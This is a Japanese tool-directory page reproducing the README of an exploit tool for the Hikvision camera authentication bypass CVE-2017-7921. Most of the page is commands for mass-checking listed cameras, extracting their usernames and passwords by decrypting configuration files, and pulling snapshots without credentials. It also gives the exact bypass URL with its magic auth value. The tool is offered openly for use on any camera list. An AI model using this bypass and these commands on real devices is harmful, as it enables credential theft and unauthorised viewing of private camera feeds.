Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-7921 — HikVision Auth Bypass CVE。このツールは、マジッククッキーまたは提供された認証情報に基づいて、認証情報の抽出とスナップショットの取得が可能です。 | Kitploit
ツール/GitHubGitHub/mverschu/cve-2017-7921
偵察IoTセキュリティパスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集認証
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE。このツールは、マジッククッキーまたは提供された認証情報に基づいて、認証情報の抽出とスナップショットの取得が可能です。

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hikvision カメラ一覧取得&スナップショットツール

ファイルからHikvisionカメラを一覧表示し、有効な認証情報(HTTP BasicまたはDigest認証)またはCVE認証バイパスを使用して各カメラからスナップショットを取得するスタンドアロンツール。テスト用に別のホストでの実行を想定しています。

特徴

  • カメラ一覧表示:テキストファイルから読み込みます(1行につきhostまたはhost:portを1つ)。
  • チェック(CVE):各カメラでマジック認証バイパスCVEをテストします(認証情報不要)。脆弱なデバイスにはオプションの--save-snapshot。
  • 認証情報(抽出):CVE経由で各カメラからユーザー名/パスワードを抽出します(マジック認証+設定ファイルの復号)。OpenSSLが必要です。
  • 認証チェック:ユーザー名/パスワードが各カメラで受け入れられるか検証します(スナップショットは保存されません)。
  • 全カメラのスナップショット:カメラごとに1枚の画像を取得します(有効な認証情報、または認証情報なしでCVEバイパスを使用する--exploit)。
  • 同時リクエスト(ワーカー数は設定可能)。
  • オプションのHTTP Digest認証。オプションの--mergeで1枚の概要画像を生成。依存関係:requests、Pillow(--merge用)。

必要環境

  • Python 3.8+
  • requests

インストール

root@kitploit:~
pip install -r requirements.txt

カメラリストファイル

1行に1台のカメラを記述したテキストファイルを作成します。#で始まるコメント行は無視されます。

root@kitploit:~
# Example cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

使用方法

カメラの一覧表示

ファイルから読み込んだカメラを表示します(認証情報は不要)。

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

オプションの到達可能性チェック(各ホストへのHTTP GET):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

チェック(CVE)

各カメラでHikvisionスナップショット認証バイパスCVEをテストします。認証情報は不要です。

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

脆弱なカメラのスナップショットのみ保存:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

オプション:--timeout、--workers、-o(--save-snapshot用)。

認証情報(抽出)

CVE経由で各カメラから認証情報を抽出します(マジック認証でユーザーリストと設定ファイルを取得し、その後設定を復号)。ホストにOpenSSLが必要です。実行に認証情報は不要です。

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

オプション:--timeout、--workers。

認証チェック

あなたの認証情報が各カメラで機能するか検証します(スナップショットと同じエンドポイントを使用し、画像は保存しません)。

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

オプション:--timeout、--workers、--digest(スナップショットと同じ)。

全カメラのスナップショット

カメラごとに1枚のスナップショットを取得しJPEGとして保存します。有効な認証情報または**--exploit**(CVE認証バイパス、認証情報不要)のいずれかを使用します。

root@kitploit:~
# With credentials
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# With CVE exploit (no credentials)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • スナップショットはデフォルトでsnapshots/に保存されます(-oで変更可能)。
  • ファイル名はhostまたはhost_portから生成されます(例:192_168_1_100.jpg、nvr_local_8080.jpg)。

オプション:

--mergeを使用すると、各スナップショットの保存後、ツールは出力ディレクトリに、カメラごとに1セルとラベルを持つ単一のグリッド画像(overview.jpg)を生成します。Pillowが必要です(pip install Pillow)。

カスタム出力とDigest認証を使用した例:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

結合された概要画像を使用した例:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# or with exploit (no creds):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

エンドポイント

認証付きスナップショット(認証情報あり):スクリプトは次の順序で試行します – /ISAPI/Streaming/channels/1/picture、/ISAPI/Streaming/channels/101/picture、/onvif-http/snapshot。

CVE(check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK(マジック認証バイパス、認証情報なし)。

別のホストでの実行

  1. hikvision_snapshots.py、requirements.txt、およびお使いのカメラリストファイルをホストにコピーします。
  2. インストール:pip install -r requirements.txt
  3. ファイルを確認するにはlistを実行し、CVEにはcheck、認証情報にはauth-check、またはsnapshot(-u/-pまたは--exploit付き)を使用します。

ホストがすべてのカメラのIPアドレスとポートにネットワークアクセスできることを確認してください。

ツールをダウンロード
OptionDescriptionDefault
-u, --usernameカメラのユーザー名--exploit以外は必須
-p, --passwordカメラのパスワード--exploit以外は必須
--exploitCVEマジック認証バイパスを使用(認証情報不要)オフ
-o, --output-dirスナップショット画像の保存先ディレクトリsnapshots
--timeoutHTTPタイムアウト(秒)15
--workers同時スナップショットリクエスト数10
--digestBasicの代わりにHTTP Digest認証を使用オフ
--merge全スナップショットを1枚の概要画像に結合オフ
--merge-columns結合時のグリッド列数(デフォルト:auto)auto